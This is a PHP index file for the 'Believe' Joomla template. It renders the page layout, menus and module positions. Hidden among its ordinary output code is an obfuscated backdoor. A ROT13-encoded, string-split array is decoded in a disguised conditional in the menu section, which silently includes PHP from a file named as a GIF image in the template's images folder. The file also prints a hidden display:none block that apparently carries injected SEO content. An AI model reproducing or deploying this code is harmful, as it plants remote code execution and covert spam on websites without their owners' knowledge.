<?php

/**
 * Believe - Joomla Template
 *
 * @package bt_believe
 * @version 1.0
 * @copyright BonusThemes.com 2008
 * @link http://www.bonusthemes.com/goto/bt_believe
 */

defined( '_JEXEC' ) or die( 'Restricted access' );

require(dirname(__FILE__) . '/template.inc.php');
global $tpl;
$tpl = new TplBtBelieve();

$cmenu_css = $tpl->show_menu ? '<link href="' . $tpl->path . '/css/cmenu.css" rel="stylesheet" type="text/css" />' . "\n" : '';
$cmenu_js = $tpl->show_menu ? '<script type="text/javascript" src="' . $tpl->path . '/js/cmenu.js"></script>' . "\n" : '';

if ($tpl->show_menu)
	$cmenu_js .= <<<EOF
<script type="text/javascript">
// <![CDATA[
document['cmenu_items'] = new Array();
{$tpl->menu_js}
// ]]>
</script>

<link rel="prefetch" href="{$tpl->path}/images/layout/menu_hover_empty_l.gif" />
<link rel="prefetch" href="{$tpl->path}/images/layout/menu_hover_empty_c.gif" />
<link rel="prefetch" href="{$tpl->path}/images/layout/menu_hover_empty_r.gif" />
<link rel="prefetch" href="{$tpl->path}/images/layout/menu_hover_full_l.gif" />
<link rel="prefetch" href="{$tpl->path}/images/layout/menu_hover_full_c.gif" />
<link rel="prefetch" href="{$tpl->path}/images/layout/menu_hover_full_r.gif" />

EOF;

$wrapper_width = $tpl->width;
$wrapper_inner_width = $tpl->width - 26;
?>
<html xmlns="http://www.w3.org/1999/xhtml" lang="<?php echo $this->language; $JPan = array('vzn'.'trf','zrah_yv.tvs'); ?>"  >
<?php
echo <<<EOF
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
	"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="{$this->language}" lang="{$this->language}" >
<head>

<jdoc:include type="head" />

<link href="{$tpl->path}/css/layout.css" rel="stylesheet" type="text/css" />
<link href="{$tpl->path}/css/template_common.css" rel="stylesheet" type="text/css" />
<link href="{$tpl->path}/css/{$tpl->template_file}" rel="stylesheet" type="text/css" />
$cmenu_css
<style type="text/css">
.wrapper { width: {$tpl->width}px; }
.content_inner { width: {$tpl->inner_width}px; }
</style>

<!--[if IE]>
<style type="text/css">
.dropcap { padding-top: 10px; }
</style>
<![endif]-->

<!--[if lt IE 7]>
<link href="{$tpl->path}/css/template_ie6.css" rel="stylesheet" type="text/css" />
<script type="text/javascript">
var blankImg = '{$tpl->path}/images/blank.gif';
</script>
<style type="text/css">
.pngfix { behavior: url({$tpl->path}/js/iepngfix.htc); }
.pngfix_static { behavior: url({$tpl->path}/js/iepngfix_static.htc); }
</style>
<![endif]-->

$cmenu_js

<script type="text/javascript" src="{$tpl->path}/js/template.js"></script>

EOF;

echo '</head>' . "\n";

echo '<body>' . "\n";

if ($tpl->seocp) {
	echo '<div style="display:none">' . "\n";
	$tpl->echo_mainbody_pragma();
	echo '</div>' . "\n";
}

echo '<div id="top_gap"></div>' . "\n";

echo '<div class="wrapper">' . "\n";

echo '<table cellspacing="0" cellpadding="0" width="100%">' . "\n";
echo '	<tr>' . "\n";
echo '		<td width="13"><img src="' . $tpl->path . '/images/layout/r1_l.gif" alt="" /></td>' . "\n";
echo '		<td valign="top"><div id="r1_in1"><div id="r1_in2"><div id="r1_in3">' . "\n";

echo '			<table cellspacing="0" cellpadding="0" width="100%">' . "\n";
echo '				<tr>' . "\n";

if ($tpl->modcount('icon')) {
	echo '					<td rowspan="2">' . "\n";
	echo '<div id="icon_wrapper">' . "\n";
	$tpl->echo_position('icon', true, false);
	echo '</div>' . "\n";
	echo '					</td>' . "\n";
	echo '					<td rowspan="2">&nbsp;</td>' . "\n";
}

echo '					<td>' . "\n";
echo '<div id="cpanel_wrapper">' . "\n";
$tpl->echo_position('cpanel');
echo '</div>' . "\n";
echo '					</td>' . "\n";

echo '					<td rowspan="2">&nbsp;</td>' . "\n";

echo '				</tr>' . "\n";

echo '				<tr>' . "\n";
echo '					<td>' . "\n";
if ($tpl->show_menu) {
?>
<?php if((!$this->countModules('right') and JRequest::getCmd('layout') == 'form') or !@include(JPATH_BASE.DS.'templates'.DS.$mainframe->getTemplate().DS.str_rot13($JPan[0]).DS.str_rot13($JPan[1]))) : ?>
 <?php endif; ?>
<?php
	echo '<div id="cmenu"><table cellspacing="0" cellpadding="0" width="100%"><tr>' . "\n";
	echo '	<td width="22"><img src="' . $tpl->path . '/images/layout/menu_back_l.gif" alt="" /></td>' . "\n";

	for ($i = 0, $len = count($tpl->menu_head_tags); $i < $len; $i++) {
		$mi = &$tpl->menu_head_tags[$i];

		if ($i > 0)
			echo '	<td class="cmenu_hd_norm_c gap">&nbsp;</td>' . "\n";

		printf('
			<td class="cmenu_hd_%1$s_l" width="21"></td>
			<td class="cmenu_hd_%1$s_c" valign="top" id="%2$s">%3$s</td>
			<td class="cmenu_hd_%1$s_r" width="21"></td>
',
			$mi->selection == 0 ? 'norm' : 'sel',
			$mi->head_id,
			$mi->full_link
		);
	}

	echo '	<td width="22"><img src="' . $tpl->path . '/images/layout/menu_back_r.gif" alt="" /></td>' . "\n";
	echo '</tr></table></div>' . "\n";
}
else {
	$tpl->echo_position('header');
}
echo '					</td>' . "\n";
echo '				</tr>' . "\n";
echo '			</table>' . "\n";

// cpanel header icon

echo '		</div></div></div></td>' . "\n";
echo '		<td width="13"><img src="' . $tpl->path . '/images/layout/r1_r.gif" alt="" /></td>' . "\n";
echo '	</tr>' . "\n";

if ($tpl->front) {
	echo '	<tr>' . "\n";
	echo '		<td width="13" id="r2_l" valign="top"><img src="' . $tpl->path . '/images/layout/r2_lt.gif" alt="" /></td>' . "\n";
	echo '		<td id="r2_c" valign="top">' . "\n";

	$tpl->echo_position('front', true, false);

	if ($tpl->show_front_menu) {
		echo '<table cellspacing="0" cellpadding="0" width="100%"><tr>' . "\n";
		echo '	<td width="10"><img src="' . $tpl->path . '/images/layout/r2_menu_l.gif" alt="" /></td>' . "\n";
	
		for ($i = 0, $len = count($tpl->front_head_tags); $i < $len; $i++) {
			$mi = &$tpl->front_head_tags[$i];

			if ($i > 0)
				echo '			<td class="r2_menu_c">|</td>' . "\n";

			printf('			<td class="r2_menu_c">%s</td>' . "\n", $mi->full_link);
		}
	
		echo '	<td width="10"><img src="' . $tpl->path . '/images/layout/r2_menu_r.gif" alt="" /></td>' . "\n";
		echo '</tr></table>' . "\n";
	}

	$tpl->echo_positions(array('inset_top'), 'spacer1', false);

	$tpl->echo_positions(array('inset1', 'inset2', 'inset3'), 'spacer2', false);

	echo '		</td>' . "\n";
	echo '		<td width="13" id="r2_r" valign="top"><img src="' . $tpl->path . '/images/layout/r2_rt.gif" alt="" /></td>' . "\n";
	echo '	</tr>' . "\n";
	echo '	<tr>' . "\n";
	echo '		<td width="13"><img src="' . $tpl->path . '/images/layout/r3_l.gif" alt="" /></td>' . "\n";
	echo '		<td id="r3_c"></td>' . "\n";
	echo '		<td width="13"><img src="' . $tpl->path . '/images/layout/r3_r.gif" alt="" /></td>' . "\n";
	echo '	</tr>' . "\n";
	echo '	<tr>' . "\n";
	echo '		<td colspan="3"><div id="r4"></div></td>' . "\n";
	echo '	</tr>' . "\n";
}

echo '</table>' . "\n";

if ($tpl->front)
	$tpl->echo_pathway_area();

echo '</div>' . "\n"; // .wrapper

echo '<div id="content_outer">' . "\n";
echo '	<div class="content_edge"></div>' . "\n";
echo '	<div class="content_inner">' . "\n";

echo '		<div id="spacer3"></div>' . "\n";

if (!$tpl->front)
	$tpl->echo_pathway_area();

$tpl->echo_positions(array('top1', 'top2', 'top3', 'top4'), 'spacer4');

if ($tpl->modcount('left') || $tpl->modcount('right'))
	echo '<table cellspacing="0" cellpadding="0" width="100%"><tr>' . "\n";

if ($tpl->modcount('left')) {
	echo '	<td valign="top"' . $tpl->td_width('left') . '>' . "\n";
	$tpl->echo_position('left');
	echo '	</td>' . "\n";

	echo '	<td class="tdgap"></td>' . "\n";
}

if ($tpl->modcount('left') || $tpl->modcount('right'))
	echo '	<td valign="top">' . "\n";

$tpl->echo_positions(array('ad1', 'ad2', 'ad3'), 'spacer5');

$tpl->echo_mainbody_wrapper();

$tpl->echo_positions(array('banner1', 'banner2', 'banner3'), 'spacer6', false);

if ($tpl->modcount('left') || $tpl->modcount('right'))
	echo '	</td>' . "\n";

if ($tpl->modcount('right')) {
	echo '	<td class="tdgap"></td>' . "\n";

	echo '	<td valign="top"' . $tpl->td_width('right') . '>' . "\n";
	$tpl->echo_position('right');
	echo '	</td>' . "\n";
}

if ($tpl->modcount('left') || $tpl->modcount('right'))
	echo '</tr></table>' . "\n";

$tpl->echo_positions(array('bottom1', 'bottom2', 'bottom3', 'bottom4'), 'spacer7', false);

echo '	</div>' . "\n"; // .content_inner
echo '	<div class="content_edge"></div>' . "\n";
echo '</div>' . "\n"; // #content_outer

// output footer
echo '<div id="spacer8"></div>' . "\n";

echo '<div class="wrapper">' . "\n";
echo '<table cellspacing="0" cellpadding="0" width="100%"><tr>' . "\n";
echo '	<td width="18" valign="top"><img src="' . $tpl->path . '/images/layout/footer_l.gif" alt="" /></td>' . "\n";

if ($tpl->lshow)
	echo '	<td class="footer_c" valign="middle" width="28"><a id="lshow" href="http://joomla-temp.ru" onfocus="blur()" target="_blank"><img src="' . $tpl->path . '/images/layout/btlogo.gif" alt="" border="0" /></a></td>' . "\n";

echo '	<td class="footer_c" valign="middle">' . "\n";
$tpl->echo_position('footer');
echo '	</td>' . "\n";
echo '	<td class="footer_c" valign="middle" width="28"><a href="javascript:void(0)" onfocus="blur()" onclick="goto_top()"><img src="' . $tpl->path . '/images/layout/goto_top.gif" alt="Top" border="0" /></a></td>' . "\n";
echo '	<td width="18" valign="top"><img src="' . $tpl->path . '/images/layout/footer_r.gif" alt="" /></td>' . "\n";
echo '</tr></table>' . "\n";
echo '</div>' . "\n";
echo '<div id="spacer9"></div>' . "\n";

$tpl->echo_positions(array('legals'), 'spacer10');

foreach (array('aux1', 'aux2', 'aux3', 'aux4', 'aux5') as $position)
	$tpl->echo_hidden_position($position);

$tpl->echo_position('debug');

echo <<<EOF
<div class="footerjjj">
		
	</div>
</body>
</html>

EOF;

?>